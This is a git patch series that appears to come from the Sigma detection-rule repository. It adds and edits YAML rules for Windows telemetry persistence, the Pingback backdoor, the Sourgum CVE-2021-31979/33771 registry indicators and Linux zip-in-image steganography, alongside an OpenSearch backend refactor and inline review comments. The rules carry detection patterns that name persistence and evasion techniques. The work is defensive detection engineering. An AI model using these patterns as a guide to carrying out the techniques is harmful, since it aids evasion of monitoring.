NT\CurrentVersion\AppCompatFlags\TelemetryController\ - Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' - condition: selection ---- -id: f548a603-c9f2-4c89-b511-b089f7e94549 logsource: product: windows category: process_creation detection: selection: CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\\\Application Experience\\\\Microsoft Compatibility Appraiser.*' - condition: selection \ No newline at end of file + condition: selection +falsepositives: + - none +level: high diff --git a/rules/windows/sysmon/sysmon_pingback_backdoor.yml b/rules/windows/process_creation/process_creation_pingback_backdoor.yml similarity index 61% rename from rules/windows/sysmon/sysmon_pingback_backdoor.yml rename to rules/windows/process_creation/process_creation_pingback_backdoor.yml index a800c432..bb111e31 100644 
--- a/rules/windows/sysmon/sysmon_pingback_backdoor.yml +++ b/rules/windows/process_creation/process_creation_pingback_backdoor.yml @@ -1,40 +1,16 @@ -action: global title: Pingback Backdoor +id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 status: experimental description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report author: Bhabesh Raj date: 2021/05/05 -falsepositives: - - Very unlikely -level: high +modified: 2021/09/09 references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 tags: - attack.persistence - attack.t1574.001 ---- -id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 -logsource: - product: windows - category: file_event -detection: - selection: - Image|endswith: updata.exe - TargetFilename: 'C:\Windows\oci.dll' - condition: selection ---- -id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b -logsource: - product: windows - category: image_load -detection: - selection: - Image|endswith: 'msdtc.exe' - ImageLoaded: 'C:\Windows\oci.dll' - condition: selection ---- -id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 logsource: product: windows category: process_creation @@ -47,3 +23,6 @@ detection: - 'start' - 'auto' condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml new file mode 100644 index 00000000..459fc153 --- /dev/null +++ b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml 
@@ -0,0 +1,30 @@ +title: Abusing Windows Telemetry For Persistence +id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 +status: experimental +description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. +references: + - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1112 + - attack.t1053 +author: Sreeman +date: 2020/09/29 +modified: 2021/09/09 +fields: + - EventID + - CommandLine + - TargetObject + - Details +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\' + Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' + condition: selection +falsepositives: + - none +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml new file mode 100644 index 00000000..1126237c --- /dev/null +++ b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml 
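Review bot: The `Details|re` pattern leaves its dots unescaped, so `.exe` also matches any character followed by `exe`, and unlike the process_creation sibling in this same patch it has no `(?i)`, so a value ending in `.EXE` or `.Dll` is missed wherever the backend's regex is case-sensitive. Suggest `Details|re: '(?i).*\.(sh|exe|dll|bin|bat|cmd|js|ps|vb|jar|hta|msi|vbs)$'`. The `$` anchor also means a command stored with trailing arguments (`…\payload.exe /q`) will not match; if that is deliberate it belongs in the description. The `fields` list still names `CommandLine`, which a registry event does not carry, while the `TargetObject` prefix changed from `HKEY_LOCAL_MACHINE\` to `HKLM\` — correct for Sysmon's rendering, but the `modified` date alone does not record that behavioural change.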
@@ -0,0 +1,31 @@ +title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +id: 32b5db62-cb5f-4266-9639-0fa48376ac00 +status: experimental +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +author: Sittikorn S +date: 2021/07/16 +modified: 2021/09/09 +references: + - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ + - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ + - https://nvd.nist.gov/vuln/detail/cve-2021-33771 + - https://nvd.nist.gov/vuln/detail/cve-2021-31979 +tags: + - attack.credential_access + - attack.t1566 + - attack.t1203 + # - threat_group.Sourgum +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|contains: + - '\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32' + - '\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32' + keywords: + - IMJPUEXP.DLL + condition: selection and keywords +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 41458d8a5aad886def9a575830aebe3e3430105d Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Thu, 9 Sep 2021 16:13:27 +0200 Subject: [PATCH 0812/1367] New Rule - Linux Auditd Hidden Files - Steganography --- .../lnx_auditd_hidden_files_steganography.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml new file mode 100644 index 00000000..ec2ec72c --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml 
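Review bot: `keywords: - IMJPUEXP.DLL` paired with a field-based `selection` relies on the backend supporting free-text keyword search on a categorised `registry_event` source, which field-mapped pipelines cannot express, and the DLL path is known to land in the value being written. Binding it to the field is both portable and less prone to incidental matches elsewhere in the event: `selection_dll:` / `Details|contains: 'IMJPUEXP.DLL'` with `condition: selection and selection_dll`. The two CLSID paths spell `InprocServer32` and `InProcServer32` differently; Sigma matching is case-insensitive by default, but normalising them avoids silently losing one on a case-sensitive backend. The commented-out `# - threat_group.Sourgum` tag is dead text in a critical-level rule and should either be a real tag or go.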
@@ -0,0 +1,39 @@ +title: Obfuscated Files or Information - Steganography +id: 45810b50-7edc-42ca-813b-bdac02fb946b +description: Detects appending of zip file to image +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - cat + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + a2: + - a2|endswith: '.zip' + condition: commands and a1 and a2 +--- +id: edd595d7-7895-4fa7-acb3-85a18a8772ca +detection: + commands: + type: EXECVE + a0: + - unzip + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + condition: commands and a1 \ No newline at end of file From 0971fe1d493044d0bf57677d400ec14986ec6526 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:27:57 +0200 Subject: [PATCH 0813/1367] Update lnx_auditd_hidden_files_steganography.yml Fixing the listing issue --- .../auditd/lnx_auditd_hidden_files_steganography.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index ec2ec72c..1e21a820 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -18,22 +18,20 @@ logsource: detection: commands: type: EXECVE - a0: - - cat + a0: cat a1: - a1|endswith: '.jpg' - a1|endswith: '.png' a2: - - a2|endswith: '.zip' + a2|endswith: '.zip' condition: commands and a1 and a2 --- id: edd595d7-7895-4fa7-acb3-85a18a8772ca detection: commands: type: EXECVE - a0: - - unzip + a0: unzip a1: - a1|endswith: '.jpg' - a1|endswith: '.png' - condition: commands and a1 \ No newline at end of file + condition: commands and a1 
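Review bot: Both detections assume the image name is the argument at exactly `a1`, so any option before it defeats them: `unzip -o hidden.jpg` or `unzip -d out hidden.jpg` shifts the file to `a2`/`a3`, and the second document then never fires. Either OR in the next argument slots (`a2|endswith`, `a3|endswith`) or state the positional limitation in the description. `a0: - cat` and `a0: - unzip` wrap single values in one-element lists for no reason; `a0: cat` is the usual form. The detection is extension-based only, so `falsepositives: - None` should acknowledge that a renamed image or archive bypasses it entirely.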
From 62db796fc2d470d509c6def41802dd6ef3e51cbe Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:46:41 +0200 Subject: [PATCH 0814/1367] Update lnx_auditd_hidden_files_steganography.yml Formatting changes --- rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index 1e21a820..c7719df7 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -1,5 +1,4 @@ title: Obfuscated Files or Information - Steganography -id: 45810b50-7edc-42ca-813b-bdac02fb946b description: Detects appending of zip file to image author: 'Pawel Mazur' status: experimental @@ -15,6 +14,8 @@ level: low logsource: product: linux service: auditd +--- +id: 45810b50-7edc-42ca-813b-bdac02fb946b detection: commands: type: EXECVE From 458973af81a6ab3f1c29c4b14d9778bbfc437383 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:52:58 +0200 Subject: [PATCH 0815/1367] Update lnx_auditd_hidden_files_steganography.yml Adding missing field: action --- rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index c7719df7..ec9ddaba 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -1,3 +1,4 @@ +action: global title: Obfuscated Files or Information - Steganography description: Detects appending of zip file to image author: 'Pawel Mazur' From c2c1b21a27b9d2f444fd1c5d151280d4f1b03396 Mon Sep 17 00:00:00 2001 
From: Young Date: Thu, 9 Sep 2021 10:40:48 -0700 Subject: [PATCH 0816/1367] cleaning up changed files --- .DS_Store | Bin 8196 -> 0 bytes tools/.DS_Store | Bin 6148 -> 0 bytes tools/sigma/backends/base.py | 3 +++ 3 files changed, 3 insertions(+) delete mode 100644 .DS_Store delete mode 100644 tools/.DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index b4c524a393c6a725f38a82ba14af4978c2a95449..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHM-A)rh6g~qKN4i&y%cnGtrk?TrS-I47Aov%BASX7-!2yPYW!iCn9)L^MxCNfh?8Q>X?Q zU+2?}8G1clpXsXal458?_ZZRA_ zt9?&-MJJ)?By`V0uTX^S9Xw0INo18bwNbz*(60cm-KS`u%H)$5S--nmu3xrY-v)vo zsyisD@6ymBnxh;&q5{s}r!Cr{yNI$$_i)VZ0u`|jP@_sL%I8>==?G_=9)df7CvL`g zGsAdbzobmGSMff^p3wIjPy;&_b`1S3h8_o|MkVZQRH+%ojvU6YH)tDbY~ucRpg;km z$%7T3lu91mBbSyDGkz~7+d|o{A+r^+1w3@k6<0&8QmVzT&xA%PCJ#Cll z$4<4qKYMl4_kxn+RU4A*RH}eHd*XN%zn$}2UZpAH6xD@Ew*A@pPG>!nUa;2E%iRU5 zv%&3^jZC*YnY?~$>Gsw^?c`18ZTH;=+&E0=ZvxGz#n4n$A zSsyH_OqsA$(@``g&V|fnI*v)q$rI*H>W3tcN#u0sdn9BEg&7GXrB07%Y)%YuIg}Vz z&XBYSj)#P5;g0GUSwkk>fX6QqVGa!5vg7n#M7u20hL2K+@ESF5<;7kFoJNr-3E5W@ zb?otA75k7rM(6e+q1!Oz1xwA$%Ep4Vy1sgrn#*gyn3@5kkYdDA6FFqeC~(dSjH>wa zy#6l?-~T`7QJC;X0i(d*R6va7i}@Tz@bh<6d@#J$wondG*cjJSUQ$rWDh+ jVTiT`D08yf_msyO*dN~r*!$g|rsn%EC(cy=v;sc>_Ajar diff --git a/tools/.DS_Store b/tools/.DS_Store deleted file mode 100644 index fa101c297bef89862d774ae6787552022aabef46..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKT`vPc6g@*pmC(eC7s>vDCj5d$OC-Lc-ivKDqSZ#X32*!EKllrNpC`_pnJ_bp zM-k>GbI~qw%UumtMyK_OXK&j?kuW@O}>`^bO>=NAA4; z!ha6(RNjh=k=f17pja>SO#3n9SRZgGb#?K%zn#UVbs|m(FN4oGhb%$g072bgP z?udEV)l5I=%FWrKdQ-B3UxNG|y`1w-&Mc^ps(G<OLo Date: Thu, 9 Sep 2021 10:55:36 -0700 Subject: [PATCH 0817/1367] reverted changes in base.py to upstream --- tools/sigma/backends/base.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 12ffb90a..469c0648 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -65,7 +65,7 @@ class BackendOptions(dict): def _load_config_file(self, path): """ Populates options from a configuration file - + :param path: Path to the configuration file """ if path is None: @@ -337,4 +337,4 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already transformed from the original name given in the Sigma rule. """ - return fieldname \ No newline at end of file + return fieldname From ffbeec134dcd321efd3e5bbeb19867f865ad26b6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 19:56:20 +0200 Subject: [PATCH 0818/1367] Update image_load_wmiprvse_wbemcomn_dll_hijack.yml --- .../image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 1b117e85..5eeb2e83 100644 --- a/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -3,7 +3,7 @@ id: 7707a579-e0d8-4886-a853-ce47e4575aaa description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 -modified: 2021/06/10 +modified: 2021/09/09 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution From 3fbe5478c3d4d63f19e7831bfb130ee2b1d75374 Mon Sep 17 00:00:00 2001 
From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 20:34:20 +0200 Subject: [PATCH 0819/1367] Update and rename lnx_auditd_hidden_files_steganography.yml to lnx_auditd_hidden_zip_files_steganography.yml Splitting the rule into separate rules --- ...x_auditd_hidden_zip_files_steganography.yml} | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) rename rules/linux/auditd/{lnx_auditd_hidden_files_steganography.yml => lnx_auditd_hidden_zip_files_steganography.yml} (66%) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml similarity index 66% rename from rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml rename to rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index ec9ddaba..77836ffd 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -1,11 +1,12 @@ -action: global -title: Obfuscated Files or Information - Steganography +title: Steganography Hide Zip Information in Picture File +id: 45810b50-7edc-42ca-813b-bdac02fb946b description: Detects appending of zip file to image author: 'Pawel Mazur' status: experimental date: 2021/09/09 references: - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ tags: - attack.defense_evasion - attack.t1027.003 @@ -15,8 +16,6 @@ level: low logsource: product: linux service: auditd ---- -id: 45810b50-7edc-42ca-813b-bdac02fb946b detection: commands: type: EXECVE @@ -27,13 +26,3 @@ detection: a2: a2|endswith: '.zip' condition: commands and a1 and a2 ---- -id: edd595d7-7895-4fa7-acb3-85a18a8772ca -detection: - commands: - type: EXECVE - a0: unzip - a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' - condition: commands and a1 From 5a5769cce63519e5371c31e987a74a81ddf534c9 Mon Sep 17 00:00:00 2001 
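Review bot: The split-out `cat` rule matches `a1|endswith` only `.jpg` and `.png`, so `.jpeg` — the extension the cited reference's own example uses — is missed; add `- a1|endswith: '.jpeg'` alongside the two existing items. The detection is purely extension-based and only covers image-first concatenation (`cat image.jpg archive.zip`), which the new title now states, but `falsepositives: - None` should still record that renaming either file evades it. `status: experimental` with `level: low` is appropriate for that.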
From: Pawel Mazur Date: Thu, 9 Sep 2021 20:38:25 +0200 Subject: [PATCH 0820/1367] New Rule - Linux - Steganography Unzip Hidden Information From Picture File --- ...d_unzip_hidden_zip_files_steganography.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml new file mode 100644 index 00000000..de87660b --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -0,0 +1,27 @@ +title: Steganography Unzip Hidden Information From Picture File +id: edd595d7-7895-4fa7-acb3-85a18a8772ca +description: Detects extracting of zip file from image file +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - unzip + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + condition: commands and a1 \ No newline at end of file From fe53f6dd5d46a72da8e5f40141200e926dcfc250 Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 9 Sep 2021 15:02:59 -0700 Subject: [PATCH 0821/1367] moved default values to backend file --- .../sigma/backends/defaultOpensearchValues.py | 10 ------ tools/sigma/backends/opensearch.py | 33 ++++++++++++------- 2 files changed, 22 insertions(+), 21 deletions(-) delete mode 100644 tools/sigma/backends/defaultOpensearchValues.py diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py deleted file mode 100644 index 87f0a582..00000000 --- a/tools/sigma/backends/defaultOpensearchValues.py +++ /dev/null 
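Review bot: The `unzip` detection requires the image to be argument `a1`, so `unzip -o hidden.jpg`, `unzip -q hidden.jpg` or `unzip -d out hidden.jpg` move the file to `a2`/`a3` and the rule never fires — and attackers routinely pass `-o` or `-d`. The sibling `cat` rule in the previous commit was normalised to `a0: cat`, so `a0: - unzip` should match that style. Checking the next argument slots keeps the rule cheap while closing the obvious gap; the extension list should also include `.jpeg`.
```yaml
detection:
  commands:
    type: EXECVE
    a0: unzip
  image_a1:
    a1|endswith:
      - '.jpg'
      - '.jpeg'
      - '.png'
  image_a2:
    a2|endswith:
      - '.jpg'
      - '.jpeg'
      - '.png'
  image_a3:
    a3|endswith:
      - '.jpg'
      - '.jpeg'
      - '.png'
  condition: commands and (image_a1 or image_a2 or image_a3)
```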
@@ -1,10 +0,0 @@ -RULE_TYPE = "monitor" -IS_ENABLED = True -INTERVAL = 5 -UNIT = "MINUTES" -TRIGGER_NAME = "generated-trigger" -SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} -TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0" -TRIGGER_LANGUAGE = "painless" -MONITOR_INDICES = ["opensearch-security-logs"] -NUM_RESULTS = 1 \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index a2b951cb..afc0fe44 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -24,7 +24,6 @@ from uuid import uuid4 from sigma.parser.condition import SigmaAggregationParser from .elasticsearch import ElasticsearchQuerystringBackend -from .defaultOpensearchValues import * class Atom: def __init__(self, field: str, prop: str) -> None: @@ -274,6 +273,18 @@ class OpenSearchBackend(object): ) isThreshold = False + # Default values for fields exclusive to OpenSearch monitors + RULE_TYPE = "monitor" + IS_ENABLED = True + INTERVAL = 5 + UNIT = "MINUTES" + TRIGGER_NAME = "generated-trigger" + SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} + TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0" + TRIGGER_LANGUAGE = "painless" + MONITOR_INDICES = ["opensearch-security-logs"] + NUM_RESULTS = 1 + def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.tactics = self._load_mitre_file("tactics") 
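Review bot: `MONITOR_INDICES = ["opensearch-security-logs"]` and `SEVERITIES = {...}` are now mutable objects shared by every `OpenSearchBackend` instance and subclass; nothing in this hunk mutates them, but a caller doing `backend.MONITOR_INDICES.append(...)` would leak into all other instances, so `MONITOR_INDICES = ("opensearch-security-logs",)` (json serialises a tuple as a list) or a `# read-only defaults; override on a subclass or instance, never mutate in place` comment makes the intent explicit. The `SEVERITIES` values are inverted relative to the rule levels — `"1"` for critical, `"5"` for informational — which is the OpenSearch Alerting severity scale; a one-line comment there saves the next reader a lookup. The hard-coded index name is the value a deployment most often needs to change, so surfacing it as a backend option would be the natural next step. `__init__` continues past the end of the hunk.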
@@ -363,17 +374,17 @@ class OpenSearchBackend(object): ''' def map_severity(self, severity): severity = severity.lower() - return SEVERITIES[severity] if severity in SEVERITIES else SEVERITIES["medium"] + return self.SEVERITIES[severity] if severity in self.SEVERITIES else self.SEVERITIES["medium"] def create_trigger(self, severity): return [ { - "name": TRIGGER_NAME, + "name": self.TRIGGER_NAME, "severity": self.map_severity(severity), "condition": { "script": { - "source": f'{TRIGGER_SCRIPT}', - "lang": TRIGGER_LANGUAGE + "source": f'{self.TRIGGER_SCRIPT}', + "lang": self.TRIGGER_LANGUAGE } }, "actions": [] @@ -419,9 +430,9 @@ class OpenSearchBackend(object): return [ { "search": { - "indices": MONITOR_INDICES, + "indices": self.MONITOR_INDICES, "query": { - "size": NUM_RESULTS, + "size": self.NUM_RESULTS, "aggregations": {}, "query": self.build_query(translation) } @@ -550,14 +561,14 @@ class OpenSearchBackend(object): references = self.get_references(configs) rule = { - "type": RULE_TYPE, + "type": self.RULE_TYPE, "name": rule_name, "description": rule_description, - "enabled": IS_ENABLED, + "enabled": self.IS_ENABLED, "schedule": { "period": { - "interval": INTERVAL, - "unit": UNIT + "interval": self.INTERVAL, + "unit": self.UNIT } }, "inputs": inputs, From 5470c40ca6749c5ef4fd4497778a0382973ee148 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 20:56:11 -0600 Subject: [PATCH 0822/1367] Resolving Comment selection2: ParentImage: removed - since there is only one attribute. --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index f8410024..65dc6850 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml 
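Review bot: `map_severity` still silently maps any unknown level to medium, so a misspelled `level` in a rule produces a monitor at the wrong severity with no signal to the author; at minimum log the fallback (`logger.warning("unknown level %r, defaulting to medium", severity)`) before returning it. The membership test plus lookup collapses to `return self.SEVERITIES.get(severity, self.SEVERITIES["medium"])`. In `create_trigger`, `f'{self.TRIGGER_SCRIPT}'` is a redundant f-string around a plain string — `"source": self.TRIGGER_SCRIPT,` is equivalent. The surrounding methods start and end outside these hunks.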
+++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -21,7 +21,7 @@ detection: - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' selection2: - - ParentImage: + ParentImage: - winword.exe - excel.exe - powerpnt.exe From ff08de6d201a493916e9e30314df437189a32b7c Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:02:11 -0600 Subject: [PATCH 0823/1367] Completed Changes based on review selection2: ParentPrcessName|endswith: --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 19f87e10..8fea8200 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -23,7 +23,7 @@ detection: - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: - - ParentPrcessName|endswith: + ParentPrcessName|endswith: - winword.exe - excel.exe - powerpnt.exe From 918bcfbf8aff74203c208c052af89d6d68a6ef2c Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:04:09 -0600 Subject: [PATCH 0824/1367] Completed requested changes selection2: Image|endswith: --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index d61ba1b6..d459f816 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml 
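Review bot: `ParentImage: - winword.exe` is an exact-value match, and Sysmon/EDR process events carry the parent's full path (`C:\…\WINWORD.EXE`), so after removing the list dash this selection still never matches; it needs `ParentImage|endswith:` with a leading backslash on each value, `- '\winword.exe'` / `- '\excel.exe'` / `- '\powerpnt.exe'`, where the `\` prevents `notwinword.exe`-style matches. `selection1` uses `ProcessCommandLine|contains: 'wmic '`, which is not the standard Sigma `CommandLine` field for `process_creation`, so backend field mappings will leave it untranslated. The condition and the rest of the detection are outside this hunk.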
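Review bot: `ParentPrcessName|endswith:` is misspelled, and for a Sysmon rule that also matches on `OriginalFileName` and `Description` the parent field is `ParentImage` in any case; as written the selection references a field no backend config maps, so it can never match. The values `winword.exe`, `excel.exe`, `powerpnt.exe` lack a leading backslash, so `endswith` would also accept `notwinword.exe`; use `ParentImage|endswith:` with `- '\winword.exe'` and so on. The condition is outside this hunk.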
+++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -22,7 +22,7 @@ detection: EventType: WMIExecution WMIcommand|contains: 'Win32_Process\:\:Create' selection2: - - Image|endswith: + Image|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' From d3b4a6aa7a31f07dbf70a0a1d200da5233fa0767 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:09:24 -0600 Subject: [PATCH 0825/1367] Changed title based on comments title: File Creation by Office Applications --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index d56f39e3..032643c0 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,4 @@ -title: Executable and Files creation by Office Applications +title: File Creation by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 